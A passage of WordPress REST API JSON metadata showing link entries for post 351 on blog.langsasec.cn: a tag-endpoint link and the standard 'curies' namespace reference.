y":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}